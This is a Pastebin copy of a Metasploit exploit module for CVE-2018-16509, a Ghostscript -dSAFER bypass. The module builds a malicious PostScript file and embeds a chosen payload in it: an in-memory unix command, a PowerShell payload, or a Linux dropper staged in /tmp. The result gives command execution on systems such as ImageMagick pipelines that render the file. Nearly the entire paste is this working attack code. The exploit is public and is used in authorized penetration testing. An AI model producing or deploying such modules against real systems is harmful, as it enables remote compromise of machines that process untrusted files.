SHARE
TWEET

CVE-2018-16509

TVT618 Sep 24th, 2018 291 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5.  
  6. class MetasploitModule < Msf::Exploit
  7.  
  8.   Rank = ExcellentRanking
  9.  
  10.   PLACEHOLDER_STRING  = 'metasploit'
  11.   PLACEHOLDER_COMMAND = 'echo vulnerable > /dev/tty'
  12.  
  13.   include Msf::Exploit::FILEFORMAT
  14.   include Msf::Exploit::CmdStager
  15.   include Msf::Exploit::Powershell
  16.  
  17.   def initialize(info = {})
  18.     super(update_info(info,
  19.       'Name'           => 'Ghostscript Failed Restore Command Execution',
  20.       'Description'    => %q{
  21.         This module exploits a -dSAFER bypass in Ghostscript to execute
  22.         arbitrary commands by handling a failed restore (grestore) in
  23.         PostScript to disable LockSafetyParams and avoid invalidaccess.
  24.  
  25.         This vulnerability is reachable via libraries such as ImageMagick,
  26.         and this module provides the latest vector for Ghostscript.
  27.  
  28.         For previous Ghostscript vectors, please see the following modules:
  29.           exploit/unix/fileformat/ghostscript_type_confusion
  30.           exploit/unix/fileformat/imagemagick_delegate
  31.       },
  32.       'Author'         => [
  33.         'Tavis Ormandy', # Vuln discovery and exploit
  34.         'wvu'            # Metasploit module
  35.       ],
  36.       'References'     => [
  37.         ['CVE', '2018-16509'],
  38.         ['URL', 'http://seclists.org/oss-sec/2018/q3/142'],
  39.         ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1640']
  40.       ],
  41.       'DisclosureDate' => 'Aug 21 2018',
  42.       'License'        => MSF_LICENSE,
  43.       'Platform'       => ['unix', 'linux', 'win'],
  44.       'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
  45.       'Privileged'     => false,
  46.       'Targets'        => [
  47.         ['Unix (In-Memory)',
  48.          'Platform'    => 'unix',
  49.          'Arch'        => ARCH_CMD,
  50.          'Type'        => :unix_memory,
  51.          'Payload'     => {'Space' => 4089, 'DisableNops' => true} # 4096 total
  52.         ],
  53.         ['PowerShell (In-Memory)',
  54.          'Platform'    => 'win',
  55.          'Arch'        => [ARCH_X86, ARCH_X64],
  56.          'Type'        => :psh_memory
  57.         ],
  58.         ['Linux (Dropper)',
  59.          'Platform'    => 'linux',
  60.          'Arch'        => [ARCH_X86, ARCH_X64],
  61.          'Type'        => :linux_dropper
  62.         ]
  63.       ],
  64.       'DefaultTarget'  => 0
  65.     ))
  66.  
  67.     register_options([
  68.       OptString.new('FILENAME', [true, 'Output file', 'msf.ps'])
  69.     ])
  70.  
  71.     register_advanced_options([
  72.       OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
  73.     ])
  74.   end
  75.  
  76.   def exploit
  77.     sploit = template
  78.  
  79.     # Replace our placeholder string with a random one
  80.     sploit.sub!(PLACEHOLDER_STRING, Rex::Text.rand_text_alphanumeric(8..42))
  81.  
  82.     # Replace our test payload with the real one
  83.     case target['Type']
  84.     when :unix_memory
  85.       sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
  86.     when :psh_memory
  87.       psh = cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
  88.  
  89.       # XXX: Payload space applies to the payload, not the PSH command
  90.       if psh.length > targets[0].payload_space
  91.         fail_with(Failure::BadConfig, 'Please choose a smaller payload')
  92.       end
  93.  
  94.       sploit.sub!(PLACEHOLDER_COMMAND, psh)
  95.     when :linux_dropper
  96.       cmdstager = generate_cmdstager(
  97.         linemax: targets[0].payload_space,
  98.         temp:    datastore['WritableDir']
  99.       ).join(';')
  100.  
  101.       # XXX: Payload space applies to the payload, not the command stager
  102.       if cmdstager.length > targets[0].payload_space
  103.         fail_with(Failure::BadConfig, 'Please choose a smaller command stager')
  104.       end
  105.  
  106.       sploit.sub!(PLACEHOLDER_COMMAND, cmdstager)
  107.     end
  108.  
  109.     file_create(sploit)
  110.   end
  111.  
  112.   def template
  113.     File.read(File.join(
  114.       Msf::Config.data_directory, 'exploits', 'ghostscript', 'msf.ps'
  115.     ))
  116.   end
  117.  
  118. end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top